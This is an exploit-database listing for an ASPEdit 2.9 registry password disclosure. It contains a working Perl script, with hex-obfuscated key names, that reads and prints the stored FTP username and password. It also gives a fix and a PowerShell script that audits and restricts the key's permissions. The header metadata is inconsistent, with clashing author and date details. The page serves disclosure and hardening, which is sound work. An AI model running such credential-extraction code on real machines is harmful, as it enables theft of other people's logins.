CVE | Category | Price | Severity |
---|---|---|---|
CVE-2004-2477 | CWE-200 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Tom Ferris | High | Remote | 2005-10-06 |
Version: ASPEdit 2.9

Operating System: All Windows

Typical software: Shareware

Severity Flaw: high

Description: ASPEdit is a powerful Active Server Pages and HTML editor with full support for Visual Basic Script, Perl, ColdFusion, PHP3, MIVA, HDML, WML and style sheets.

Vulnerability: The stored administration password is visible in the Registry Editor. A local user or guest who has the privilege to open the Registry Editor can search for the vulnerable registry values and retrieve the password.

Exploit:

```perl
#!/usr/bin/perl
#
# ASPEdit FTP Password Disclosure Exploit
# ---------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.tashcom.co.uk/aspedit
#
use Win32::Registry;

print "\nASPEdit FTP Password Disclosure Exploit\n";
print "---------------------------------------\n\n";
print "Registrie: HKLM\\SOFTWARE\\tashcom\\aspedit\\ftp\n";
sleep(1);

# Hex-escaped value names and key path, decoded in the comments.
$usr = "\x66\x74\x70\x5f\x75\x73\x65\x72";              # "ftp_user"
$pas = "\x66\x74\x70\x5f\x70\x61\x73\x73\x77\x6f\x64";  # "ftp_passwod" (as written)
# Key path below HKEY_LOCAL_MACHINE; each separator is a doubled backslash.
$nutt = "\x53\x4f\x46\x54\x57\x41\x52\x45\x5c\x5c".
"\x74\x61\x73\x68\x63\x6f\x6d\x5c\x5c\x61".
"\x73\x70\x65\x64\x69\x74\x5c\x5c\x66\x74\x70";

print "[+] Start searching..\n";
print "[+] Finding username ..";
my $user;
# Open the key and read the username value.
$::HKEY_LOCAL_MACHINE->Open("$nutt", $user) or
die "Can't open username value: $^E";
sleep(1);
print "[OK]\n";
print "[+] Query value username..";
my ($type, $value);
$user->QueryValueEx("$usr", $type, $value) or
die "No such user: $^E";
sleep(1);
print "[OK]\n";

print "[+] Finding password ..";
my $pass;
# Open the same key again and read the password value.
$::HKEY_LOCAL_MACHINE->Open("$nutt", $pass) or
die "Can't open password value: $^E";
sleep(1);
print "[OK]\n";
print "[+] Query value password..";
my ($type1, $value2);
$pass->QueryValueEx("$pas", $type1, $value2) or
die "No such password: $^E";
sleep(2);
print "[OK]\n";

print "[+] Retrive data registry..\n";
sleep(1);
print "[*] User: $value\n";
print "[*] Password: $value2\n";
```

Solution: In the Registry Editor, change the registry path, then encrypt the password, which is safer. Also set permissions on the key (Advanced Security Settings): right-click the key and choose 'Permissions'.

Vendor URL: Mail - [email protected] WWW - http://www.tashcom.com

Published: basher13 (Infam0us Gr0up - Securiti Research) [email protected] / infamous.2hell.com
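The permission step of the Solution above, as an added example that is not part of the original advisory or any vendor tooling: a PowerShell audit of who can read the key, plus an optional ACL lockdown. It assumes the key path shown in the exploit's output and the `ftp_` value-name prefix used there, also checks the WOW6432Node view where a 32-bit install lands on 64-bit Windows, and the function names are hypothetical.

```powershell
# Added example: audit and tighten the ACL on the key named in this advisory.
# Run from an elevated prompt. The stored values themselves are never printed.
$Keys = 'HKLM:\SOFTWARE\tashcom\aspedit\ftp',
        'HKLM:\SOFTWARE\WOW6432Node\tashcom\aspedit\ftp'   # 32-bit view (assumption)
# Well-known SIDs of broad, non-administrative principals (locale independent).
$Broad = @{ 'S-1-1-0' = 'Everyone'; 'S-1-5-11' = 'Authenticated Users'
            'S-1-5-32-545' = 'Users'; 'S-1-5-32-546' = 'Guests'; 'S-1-5-4' = 'INTERACTIVE' }
$Read  = [System.Security.AccessControl.RegistryRights]::QueryValues

function Get-FtpKeyExposure {
    # One row per Allow ACE that lets a broad principal query the key's values.
    foreach ($k in $Keys | Where-Object { Test-Path $_ }) {
        $names = (Get-Item $k).GetValueNames() | Where-Object { $_ -like 'ftp_*' }
        foreach ($ace in (Get-Acl $k).Access) {
            $sid = $ace.IdentityReference.Translate(
                       [System.Security.Principal.SecurityIdentifier]).Value
            if ($ace.AccessControlType -eq 'Allow' -and $Broad.ContainsKey($sid) -and
                ($ace.RegistryRights -band $Read)) {
                [pscustomobject]@{ Key = $k; Principal = $Broad[$sid]
                                   Inherited = $ace.IsInherited; Values = $names -join ',' }
            }
        }
    }
}

function Protect-FtpKey {
    # Replace the DACL with explicit FullControl for Administrators and SYSTEM only.
    [CmdletBinding(SupportsShouldProcess)] param()
    foreach ($k in $Keys | Where-Object { Test-Path $_ }) {
        $acl = Get-Acl $k
        $acl.SetAccessRuleProtection($true, $false)   # stop inheriting, drop inherited ACEs
        foreach ($r in @($acl.Access)) { [void]$acl.RemoveAccessRule($r) }
        foreach ($sid in 'S-1-5-32-544', 'S-1-5-18') { # Administrators, SYSTEM
            $id = New-Object System.Security.Principal.SecurityIdentifier $sid
            $acl.AddAccessRule((New-Object System.Security.AccessControl.RegistryAccessRule(
                $id, 'FullControl', 'ContainerInherit', 'None', 'Allow')))
        }
        if ($PSCmdlet.ShouldProcess($k, 'Restrict ACL')) { Set-Acl -Path $k -AclObject $acl }
    }
}

Get-FtpKeyExposure | Format-Table -AutoSize
# Protect-FtpKey -WhatIf    # preview the change; drop -WhatIf to apply it
```

Restricting the key to Administrators and SYSTEM also stops ASPEdit from reading its saved FTP login when it runs as a standard user, and the values stay in plaintext for anyone who can still read the key.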
Copyright ©2024 Exploitalert.